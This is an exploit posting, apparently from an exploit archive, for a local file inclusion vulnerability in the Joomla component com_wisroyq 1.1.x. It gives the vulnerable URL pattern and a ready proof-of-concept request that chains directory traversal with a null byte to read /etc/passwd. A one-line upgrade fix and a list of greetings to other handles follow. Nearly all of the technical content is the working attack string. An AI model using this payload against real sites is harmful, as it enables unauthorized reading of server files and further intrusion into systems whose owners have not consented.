============================================================================================================================ [o] Joomla Component WISro Yahoo Quotes Local File Inclusion Vulnerability Software : com_wisroyq version 1.1.x [ commercial ] Vendor : http://www.wis.ro/ Author : NoGe Contact : noge[dot]code[at]gmail[dot]com Blog : http://evilc0de.blogspot.com/ Home : http://antisecurity.org/ ============================================================================================================================ [o] Exploit http://localhost/[path]/index.php?option=com_wisroyq&controller=[LFI] [o] PoC http://localhost/index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../etc/passwd%00 [o] Solution Upgrade to a higher version ============================================================================================================================ [o] Greetz Vrs-hCk OoN_BoY Paman zxvf Angela Zhang aJe martfella pizzyroot H312Y yooogy mousekill }^-^{ noname matthews s4va stardustmemory skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke ===========================================================================================================================